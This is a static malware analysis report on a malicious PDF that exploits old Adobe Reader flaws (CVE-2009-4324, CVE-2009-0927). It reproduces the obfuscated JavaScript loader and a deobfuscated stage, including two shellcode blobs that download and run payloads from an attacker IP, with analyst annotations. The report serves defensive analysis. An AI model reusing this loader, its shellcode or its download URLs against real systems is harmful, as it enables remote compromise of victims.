Malicious PDF — malware analysis report

Static analysis result for SHA-256 32d735bace0a8055…

MALICIOUS

PDF

13.9 KB First seen: 2012-10-18
MD5: 5d22b9ed5b4c747ead29549d5f0dcc0b SHA-1: 002f1402e4c364fe128bcdea730a3ec7ca937a88 SHA-256: 32d735bace0a805522dc3200d0cc105a8e6a792b0b29b124f2656690f56816d6
310 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 9

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation) In the recovered stage this is the `_5o()` branch: a 12,000-block heap spray of 0x9090 NOP sled plus the `_2o` shellcode (each block 0x8000 characters), then `this.media.newPlayer(null)` inside an empty try/catch.
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation) In the recovered stage this is the `_1o3()` branch: the `_1o` shellcode is sprayed in 180 blocks of roughly 0x40000 characters, then `Collab.getIcon()` is called with a 4,012-element array of "\n\n\n\n" strings concatenated with '_N.bundle' (the array coerces to one comma-joined string of about 20,000 characters).
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths. Here the gate is `app.viewerVersion` with its first '.' removed and right-padded with '0' to four digits (e.g. 9.3 → 9300): 8000 ≤ v ≤ 8102 or 8950 < v < 9050 selects Collab.getIcon, and the else-if test `(v>=9100)||(v<=9200)||…` is true for every numeric v, so every other version falls through to media.newPlayer.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE). In this sample the URL sits at the tail of both `%u`-encoded shellcode strings in the recovered stage: `_1o` (Collab.getIcon branch) ends in .../d7.php?f=g and `_2o` (media.newPlayer branch) ends in .../d8.php?f=n; both blobs also carry bytes that read as "urlmon" and "regsvr32 -s " when decoded as UTF-16LE word pairs (static reading, not confirmed by execution).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://91.228.133.56/dnsftrsn/ac16ab2fff6df42a7c42b0843916a3c4/d7.php?f=g — Referenced by PDF JavaScript (tail of the `_1o` shellcode used by the Collab.getIcon branch)
    • http://91.228.133.56/dnsftrsn/ac16ab2fff6df42a7c42b0843916a3c4/d8.php?f=n — Referenced by PDF JavaScript (tail of the `_2o` shellcode used by the media.newPlayer branch)
    Both are second-stage payload URLs; which one is fetched tells you which exploit branch fired. Handle them as IOCs for blocking and log searches rather than browsing to them.

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0076_000.js | pdf-javascript-stream | PDF /JS object 76 at offset 0x38A | 13132 bytes
SHA-256: b6e295b722860ecdece19e11d07d02e84e2c3dd2bac9ef91c9cabe165ecf6405
Preview script
First 1,000 lines of the extracted script
// Stage-1 loader as carved from /JS object 76. The code bytes are the sample's own; the comments are analyst annotations.
// `a` is a 65-character alphabet; every number in the `z` array that follows is an index into it.
a="o}el=xri2Fg3(]ban{t;y@5,Bsc'V_C.f%wh9>|Pu8 ApIN[d:0-1DE&Sm+v764)<";
// `w` is assembled piecewise so the method name "slice" never appears as a literal (a[2] is 'e').
w='';
w+='sl';
w+='i';
w+="c"+a[2];
// `j` ends up as the bare String.prototype.slice function, detached from any string receiver.
j='b343tb3g';
j=j[w];
// Encoded stage 2: each entry is an index into the alphabet `a` above. The loop that follows maps it to the
// script shown as generic_stage_recovery_000.js (the first entries 59,15,6 spell "var"). Left byte-for-byte
// as carved — it is evidence, not code to tidy.
z
=new Array
(59,15,6,42,29,52,0,4,27,33,40,41,11,61,61,33,40,9,30,54,62,33,40,41,22,9,30,33,40,60,22,54,62,33,40,54,36,11,62,33,40,11,11,22,9,33,40,61,62,30,50,33,40,62,50,41,24,33,40,41,24,11,50,33,40,50,30,62,50,33,40,60,50,41,24,33,40,22,61,52,30,33,40,60,61,41,24,33,40,11,11,50,41,33,40,61,61,53,24,33,40,22,54,41,24,33,40,50,11,11,30,33,40,11,11,60,62,33,40,41,52,8,30,33,40,52,22,54,54,33,40,9,9,52,50,33,40,24,41,9,9,33,40,62,50,41,24,33,40,30,11,11,50,33,40,11,36,62,61,33,40,60,22,50,61,33,40,41,60,9,24,33,40,8,62,11,62,33,40,54,62,41,22,33,40,22,52,60,22,33,40,54,24,54,36,33,40,22,52,62,30,33,40,41,24,22,61,33,40,11,30,60,22,33,40,60,62,41,24,33,40,60,41,11,22,33,40,9,22,50,11,33,40,41,24,22,61,33,40,8,50,60,61,33,40,9,22,50,11,33,40,30,36,11,11,33,40,62,52,62,36,33,40,43,53,9,30,33,40,30,22,50,11,33,40,53,24,11,11,33,40,24,54,50,9,33,40,11,41,52,50,33,40,60,62,9,8,33,40,30,52,50,41,33,40,50,53,30,24,33,40,53,43,50,11,33,40,54,24,62,50,33,40,11,24,9,52,33,40,60,22,52,9,33,40,22,54,54,61,33,40,22,54,41,24,33,40,50,11,8,62,33,40,61,61,53,53,33,40,50,30,41,24,33,40,41,53,62,24,33,40,54,30,62,61,33,40,22,62,9,9,33,40,50,30,8,62,33,40,53,41,41,24,33,40,53,53,50,11,33,40,50,62,41,24,33,40,50,11,41,24,33,40,43,24,30,22,33,40,22,36,22,54,33,40,54,24,30,11,33,40,43,53,22,11,33,40,61,41,41,24,33,40,41,50,8,50,33,40,50,30,60,53,33,40,60,62,11,11,33,40,36,61,50,11,33,40,9,11,54,24,33,40,61,41,41,24,33,40,41,24,50,41,33,40,61,43,9,60,33,40,22,36,50,22,33,40,36,41,54,41,33,40,9,9,9,9,33,40,54,8,9,9,33,40,54,41,9,36,33,40,50,50,50,50,33,40,50,50,50,50,33,40,22,50,22,41,33,40,62,50,61,43,33,40,9,9,61,41,33,40,50,50,50,50,33,40,22,50,50,50,33,40,30,50,41,11,33,40,22,50,52,36,33,40,41,24,22,22,33,40,41,24,54,30,33,40,52,50,22,54,33,40,30,11,41,11,33,40,9,9,50,22,33,40,61,41,54,11,33,40,61,54,61,9,33,40,50,50,50,50,33,40,60,22,61,41,33,40,61,30,60,8,33,40,22,62,61,53,33,40,52,61,9,9,33,40,30,62,41,11,33,40,41,24,50,41,33,40,54,41,54,41,33,40,9,9,61,52,33,40,9,9,9,9,33,40,50,8,54,24,33,40,60
,8,54,24,33,40,54,30,41,52,33,40,50,52,50,62,33,40,50,50,50,50,33,40,22,30,41,53,33,40,50,30,8,62,33,40,50,62,30,60,33,40,60,8,8,62,33,40,61,60,61,22,33,40,30,60,60,11,33,40,8,62,62,62,33,40,60,61,50,62,33,40,11,11,60,8,33,40,30,60,11,8,33,40,8,62,62,62,33,40,8,50,50,41,33,40,60,11,8,53,33,40,22,11,8,50,33,40,9,41,61,41,33,40,50,50,50,50,33,40,9,9,50,50,33,40,50,30,22,61,33,40,54,41,41,24,33,40,30,36,11,11,33,40,30,60,22,52,33,40,52,53,62,62,33,40,60,60,50,50,33,40,61,8,60,50,33,40,30,60,60,62,33,40,52,53,62,62,33,40,8,54,50,22,33,40,61,30,61,62,33,40,30,61,61,30,33,40,52,53,62,62,33,40,50,50,50,36,33,40,41,43,22,36,33,40,50,62,30,52,33,40,41,41,11,50,33,40,52,53,62,62,33,40,62,52,50,62,33,40,61,43,22,52,33,40,61,43,50,50,33,40,22,11,50,50,33,40,61,43,22,60,33,40,9,9,50,50,33,40,52,62,22,61,33,40,30,50,41,22,33,40,52,61,60,22,33,40,50,50,61,43,33,40,9,9,22,11,33,40,50,62,22,61,33,40,50,50,61,43,33,40,54,24,41,11,33,40,22,11,50,30,33,40,22,61,9,9,33,40,41,11,50,62,33,40,50,30,30,11,33,40,50,8,54,24,33,40,52,11,54,24,33,40,41,50,62,60,33,40,50,50,11,9,33,40,9,43,60,22,33,40,41,50,62,60,33,40,50,50,11,9,33,40,30,62,60,22,33,40,50,50,61,43,33,40,9,54,61,43,33,40,22,61,9,9,33,40,54,41,50,41,33,40,9,54,36,30,33,40,9,9,9,9,33,40,62,54,41,54,33,40,54,30,50,54,33,40,9,54,36,41,33,40,50,54,41,43,33,40,61,9,41,36,33,40,24,53,50,52,33,40,30,43,11,11,33,40,22,24,41,43,33,40,30,61,52,24,33,40,60,36,62,61,33,40,52,43,11,61,33,40,60,50,8,9,33,40,60,62,61,41,33,40,60,50,60,62,33,40,8,9,11,43,33,40,11,36,8,9,33,40,8,54,11,52,33,40,11,8,11,8,33,40,8,54,11,41,33,40,11,11,11,52,33,40,8,54,11,11,33,40,11,61,11,22,33,40,61,62,8,9,33,40,60,11,61,54,33,40,60,62,61,61,33,40,60,11,60,8,33,40,8,9,61,54,33,40,61,11,61,52,33,40,11,61,11,52,33,40,61,8,61,52,33,40,61,61,11,8,33,40,61,61,61,61,33,40,61,62,11,61,33,40,11,62,61,61,33,40,61,52,11,8,33,40,61,11,11,60,33,40,11,8,11,62,33,40,11,50,61,8,33,40,11,62,11,41,33,40,11,36,11,11,33,40,11,61,11,52,33,40,11,11,61,52,33,40,11,62,61,11,33,40,61,62,8
,9,33,40,8,54,11,60,33,40,61,41,60,50,33,40,11,9,60,50,33,40,11,53,61,61,33,40,50,50,61,60,33,40,50,50,50,50,27,19,59,15,6,42,29,8,0,4,27,33,40,41,11,61,61,33,40,9,30,54,62,33,40,41,22,9,30,33,40,60,22,54,62,33,40,54,36,11,62,33,40,11,11,22,9,33,40,61,62,30,50,33,40,62,50,41,24,33,40,41,24,11,50,33,40,50,30,62,50,33,40,60,50,41,24,33,40,22,61,52,30,33,40,60,61,41,24,33,40,11,11,50,41,33,40,61,61,53,24,33,40,22,54,41,24,33,40,50,11,11,30,33,40,11,11,60,62,33,40,41,52,8,30,33,40,52,22,54,54,33,40,9,9,52,50,33,40,24,41,9,9,33,40,62,50,41,24,33,40,30,11,11,50,33,40,11,36,62,61,33,40,60,22,50,61,33,40,41,60,9,24,33,40,8,62,11,62,33,40,54,62,41,22,33,40,22,52,60,22,33,40,54,24,54,36,33,40,22,52,62,30,33,40,41,24,22,61,33,40,11,30,60,22,33,40,60,62,41,24,33,40,60,41,11,22,33,40,9,22,50,11,33,40,41,24,22,61,33,40,8,50,60,61,33,40,9,22,50,11,33,40,30,36,11,11,33,40,62,52,62,36,33,40,43,53,9,30,33,40,30,22,50,11,33,40,53,24,11,11,33,40,24,54,50,9,33,40,11,41,52,50,33,40,60,62,9,8,33,40,30,52,50,41,33,40,50,53,30,24,33,40,53,43,50,11,33,40,54,24,62,50,33,40,11,24,9,52,33,40,60,22,52,9,33,40,22,54,54,61,33,40,22,54,41,24,33,40,50,11,8,62,33,40,61,61,53,53,33,40,50,30,41,24,33,40,41,53,62,24,33,40,54,30,62,61,33,40,22,62,9,9,33,40,50,30,8,62,33,40,53,41,41,24,33,40,53,53,50,11,33,40,50,62,41,24,33,40,50,11,41,24,33,40,43,24,30,22,33,40,22,36,22,54,33,40,54,24,30,11,33,40,43,53,22,11,33,40,61,41,41,24,33,40,41,50,8,50,33,40,50,30,60,53,33,40,60,62,11,11,33,40,36,61,50,11,33,40,9,11,54,24,33,40,61,41,41,24,33,40,41,24,50,41,33,40,61,43,9,60,33,40,22,36,50,22,33,40,36,41,54,41,33,40,9,9,9,9,33,40,54,8,9,9,33,40,54,41,9,36,33,40,50,50,50,50,33,40,50,50,50,50,33,40,22,50,22,41,33,40,62,50,61,43,33,40,9,9,61,41,33,40,50,50,50,50,33,40,22,50,50,50,33,40,30,50,41,11,33,40,22,50,52,36,33,40,41,24,22,22,33,40,41,24,54,30,33,40,52,50,22,54,33,40,30,11,41,11,33,40,9,9,50,22,33,40,61,41,54,11,33,40,61,54,61,9,33,40,50,50,50,50,33,40,60,22,61,41,33,40,61,30,60,8,33,40,22,62,61,53,33,40,52,61,
9,9,33,40,30,62,41,11,33,40,41,24,50,41,33,40,54,41,54,41,33,40,9,9,61,52,33,40,9,9,9,9,33,40,50,8,54,24,33,40,60,8,54,24,33,40,54,30,41,52,33,40,50,52,50,62,33,40,50,50,50,50,33,40,22,30,41,53,33,40,50,30,8,62,33,40,50,62,30,60,33,40,60,8,8,62,33,40,61,60,61,22,33,40,30,60,60,11,33,40,8,62,62,62,33,40,60,61,50,62,33,40,11,11,60,8,33,40,30,60,11,8,33,40,8,62,62,62,33,40,8,50,50,41,33,40,60,11,8,53,33,40,22,11,8,50,33,40,9,41,61,41,33,40,50,50,50,50,33,40,9,9,50,50,33,40,50,30,22,61,33,40,54,41,41,24,33,40,30,36,11,11,33,40,30,60,22,52,33,40,52,53,62,62,33,40,60,60,50,50,33,40,61,8,60,50,33,40,30,60,60,62,33,40,52,53,62,62,33,40,8,54,50,22,33,40,61,30,61,62,33,40,30,61,61,30,33,40,52,53,62,62,33,40,50,50,50,36,33,40,41,43,22,36,33,40,50,62,30,52,33,40,41,41,11,50,33,40,52,53,62,62,33,40,62,52,50,62,33,40,61,43,22,52,33,40,61,43,50,50,33,40,22,11,50,50,33,40,61,43,22,60,33,40,9,9,50,50,33,40,52,62,22,61,33,40,30,50,41,22,33,40,52,61,60,22,33,40,50,50,61,43,33,40,9,9,22,11,33,40,50,62,22,61,33,40,50,50,61,43,33,40,54,24,41,11,33,40,22,11,50,30,33,40,22,61,9,9,33,40,41,11,50,62,33,40,50,30,30,11,33,40,50,8,54,24,33,40,52,11,54,24,33,40,41,50,62,60,33,40,50,50,11,9,33,40,9,43,60,22,33,40,41,50,62,60,33,40,50,50,11,9,33,40,30,62,60,22,33,40,50,50,61,43,33,40,9,54,61,43,33,40,22,61,9,9,33,40,54,41,50,41,33,40,9,54,36,30,33,40,9,9,9,9,33,40,62,54,41,54,33,40,54,30,50,54,33,40,9,54,36,41,33,40,50,54,41,43,33,40,61,9,41,36,33,40,24,53,50,52,33,40,30,43,11,11,33,40,22,24,41,43,33,40,30,61,52,24,33,40,60,36,62,61,33,40,52,43,11,61,33,40,60,50,8,9,33,40,60,62,61,41,33,40,60,50,60,62,33,40,8,9,11,43,33,40,11,36,8,9,33,40,8,54,11,52,33,40,11,8,11,8,33,40,8,54,11,41,33,40,11,11,11,52,33,40,8,54,11,11,33,40,11,61,11,22,33,40,61,62,8,9,33,40,60,11,61,54,33,40,60,62,61,61,33,40,60,11,60,8,33,40,8,9,61,54,33,40,61,11,61,52,33,40,11,61,11,52,33,40,61,8,61,52,33,40,61,61,11,8,33,40,61,61,61,61,33,40,61,62,11,61,33,40,11,62,61,61,33,40,61,52,11,8,33,40,61,11,11,60,33,40,11,8,11,62,33,40,1
1,50,61,8,33,40,11,62,11,41,33,40,11,36,11,11,33,40,11,61,11,52,33,40,11,11,61,52,33,40,11,62,61,11,33,40,61,62,8,9,33,40,8,54,11,41,33,40,61,41,60,50,33,40,11,9,60,50,33,40,11,53,61,61,33,40,50,50,61,54,33,40,50,50,50,50,27,19,32,40,16,26,18,7,0,16,42,29,11,0,12,63,17,59,15,6,42,29,62,0,4,15,44,44,31,59,7,2,34,2,6,28,2,6,25,7,0,16,31,18,0,56,18,6,7,16,10,12,63,19,29,62,0,4,29,62,0,31,6,2,44,3,15,26,2,12,27,31,27,23,27,27,63,19,34,35,7,3,2,12,29,62,0,31,3,2,16,10,18,35,64,62,63,17,29,62,0,58,4,27,50,27,19,1,29,62,0,4,44,15,6,25,2,45,16,18,12,29,62,0,23,52,50,63,19,6,2,18,40,6,16,42,29,62,0,19,1,32,40,16,26,18,7,0,16,42,29,22,0,12,63,17,32,40,16,26,18,7,0,16,42,29,61,0,12,63,17,59,15,6,42,29,60,0,4,27,44,21,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,42,49,42,20,20,20,20,52,52,52,27,19,40,18,7,3,31,44,6,7,16,18,48,12,29,60,0,23,16,2,34,42,53,15,18,2,12,63,63,19,1,59,15,6,42,29,41,0,4,52,8,50,50,50,19,29,36,0,4,16,2,34,42,43,6,6,15,20,12,63,19,59,15,6,42,29,52,0,50,4,27,33,40,36,50,36,50,33,40,36,50,36,50,27,19,59,15,6,42,29,52,0,52,4,29,8,0,19,29,52,0,50,4,40,16,2,25,26,15,44,2,12,29,52,0,50,63,19,29,52,0,52,4,40,16,2,25,26,15,44,2,12,29,52,0,52,63,19,34,35,7,3,2,12,29,52,0,50,31,3,2,16,10,18,35,64,4,50,5,41,50,50,50,63,17,29,52,0,50,58,4,29,52,0,50,19,1,29,52,0,50,4,29,52,0,50,31,25,40,14,25,18,6,12,50,23,50,5,41,50,50,50,51,29,52,0,52,31,3,2,16,10,18,35,63,19,42,32,0,6,12,29,52,0,8,4,50,19,29,52,0,8,64,29,41,0,19,29,52,0,8,58,58,63,17,29,36,0,47,29,52,0,8,13,4,29,52,0,50,58,29,52,0,52,19,1,7,32,12,29,41,0,63,17,29,61,0,12,63,19,29,61,0,12,63,19,18,6,20,17,18,35,7,25,31,57,2,48,7,15,31,16,2,34,39,3,15,20,2,6,12,16,40,3,3,63,19,1,26,15,18,26,35,12,2,63,17,1,29,61,0,12,63,19,1,1,32,40,16,26,18,7,0,16,42,29,52,0,11,12,63,17,59,15,6,42,29,52,0,62,4,40,16,2,25,26,15,44,2,12,29,52,0,63,19,29,52,0,22,4,40,16,2,25,26,15,44,2,12,27,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,
50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,33,40,36,50,36,50,27,63,58,29,52,0,62,19,29,52,0,61,4,40,16,2,25,26,15,44,2,12,27,33,40,36,50,36,50,33,40,36,50,36,50,27,63,19,29,52,0,60,4,52,50,19,29,52,0,41,4,29,52,0,60,58,29,52,0,22,31,3,2,16,10,18,35,19,34,35,7,3,2,12,29,52,0,61,31,3,2,16,10,18,35,64,29,52,0,41,63,29,52,0,61,58,4,29,52,0,61,19,29,52,0,36,4,29,52,0,61,31,25,40,14,25,18,6,7,16,10,12,50,23,29,52,0,41,63,19,29,8,0,8,4,29,52,0,61,31,25,40,14,25,18,6,7,16,10,12,50,23,29,52,0,61,31,3,2,16,10,18,35,51,29,52,0,41,63,19,34,35,7,3,2,12,29,8,0,8,31,3,2,16,10,18,35,58,29,52,0,41,64,50,5,62,50,50,50,50,63,29,8,0,8,4,29,8,0,8,58,29,8,0,8,58,29,52,0,36,19,29,8,0,50,4,16,2,34,42,43,6,6,15,20,12,63,19,32,0,6,12,29,8,0,52,4,50,19,29
,8,0,52,64,52,41,50,19,29,8,0,52,58,58,63,29,8,0,50,47,29,8,0,52,13,4,29,8,0,8,58,29,52,0,22,19,59,15,6,42,29,8,0,11,4,62,50,52,8,19,59,15,6,42,29,8,0,62,4,43,6,6,15,20,12,29,8,0,11,63,19,32,0,6,12,29,8,0,52,4,50,19,29,8,0,52,64,29,8,0,11,19,29,8,0,52,58,58,63,17,29,8,0,62,47,29,8,0,52,13,4,40,16,2,25,26,15,44,2,12,27,33,50,15,33,50,15,33,50,15,33,50,15,27,63,19,1,30,0,3,3,15,14,31,10,2,18,45,26,0,16,12,29,8,0,62,58,27,29,46,31,14,40,16,48,3,2,27,63,19,1,59,15,6,42,29,62,0,4,29,11,0,12,63,19,7,32,12,12,12,29,62,0,37,41,36,22,50,63,55,55,12,29,62,0,64,36,50,22,50,63,63,38,38,12,12,29,62,0,37,4,41,50,50,50,63,55,55,12,29,62,0,64,4,41,52,50,8,63,63,63,17,29,52,0,11,12,63,19,1,2,3,25,2,42,7,32,12,12,29,62,0,37,4,36,52,50,50,63,38,38,12,29,62,0,64,4,36,8,50,50,63,38,38,12,29,62,0,37,4,41,52,50,11,63,38,38,12,29,62,0,64,4,41,52,50,60,63,63,17,29,22,0,12,63,19,1);
// Decode: map every index in `z` through the alphabet `a` into `s` (the stage-2 source text).
s='';
b
=
'al';
// b2 = a[2] + a[59] + 'al' = "eval", built the same way so the word never appears as a literal.
b2
=a[2]
+
a[59]+b;for
(i=0;i<z.length;i++)
{s+=a[z[i]]}
// NOTE(review): `j` is the detached String.prototype.slice. Calling it with no receiver is presumably meant to
// hand back the global object under Reader's engine, so that e["eval"] is the real eval — a standard
// emulator-evasion trick, since a strict ES5+ engine throws on slice() with an undefined receiver instead.
// That the stage was recovered at all shows the decode works; the receiver behaviour itself is not verified here.
e=(j());
e=e[b2];
e(s);
generic_stage_recovery_000.js | deobfuscated-js | generic stage recovery (alphabet-index-array) from JavaScript object 76 at offset 0x38A | 4469 bytes
SHA-256: f611ef698f84f58826dbea01c263fd3f36f5843761081a4ec2797a40fadbbca2
Detection
ClamAV: No threats found (a negative signature result on a carved stage does not lower the verdict above, which rests on the classifier and the CVE heuristics matched in this recovered code)
Obfuscation or payload: likely
Carved artifact contains 6 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
// Stage recovered from javascript_obj0076_000.js by the alphabet-index-array transform. The code is the
// sample's own (line breaks added only between top-level statements); the comments are analyst annotations.
//
// _1o / _2o: shellcode stored as %uXXXX escapes (little-endian 16-bit words, as the
// PDF_JS_SHELLCODE_DOWNLOAD_URL rule describes). Read that way, the tail of _1o is ".../d7.php?f=g" and the
// tail of _2o is ".../d8.php?f=n" — the two Embedded URL entries above — and both blobs carry bytes that read
// as "urlmon" and "regsvr32 -s ". Static reading only; not confirmed by execution. _1o is used by the
// Collab.getIcon branch (_1o3), _2o by the media.newPlayer branch (_5o).
var _1o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E05%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u392F%u2E31%u3232%u2E38%u3331%u2E33%u3635%u642F%u736E%u7466%u7372%u2F6E%u6361%u3631%u6261%u6632%u6666%u6436%u3466%u6132%u6337%u3234%u3062%u3438%u3933%u3631%u3361%u3463%u642F%u2E37%u6870%u3F70%u3D66%u0067%u0000';
var _2o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E05%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u392F%u2E31%u3232%u2E38%u3331%u2E33%u3635%u642F%u736E%u7466%u7372%u2F6E%u6361%u3631%u6261%u6632%u6666%u6436%u3466%u6132%u6337%u3234%u3062%u3438%u3933%u3631%u3361%u3463%u642F%u2E38%u6870%u3F70%u3D66%u006E%u0000';
// Reader version probe: app.viewerVersion as a string, first '.' removed, right-padded with '0' to four digits,
// parsed base 10 (e.g. "9.3" -> 9300). Only the first '.' is replaced, so a value with two dots keeps one and
// parseInt stops at it; the gate below is therefore only meaningful for x.y-style values.
function _3o(){var _4o=app.viewerVersion.toString();_4o=_4o.replace('.','');while(_4o.length<4){_4o+='0';}_4o=parseInt(_4o,10);return _4o;}
// media.newPlayer branch (the CVE-2009-4324 heuristic above): 12,000 heap blocks, each exactly 0x8000 chars of
// 0x9090 NOP sled followed by the _2o shellcode; util.printd() is called twice before and once after
// this.media.newPlayer(null), whose exception is swallowed by the empty catch so the script keeps running.
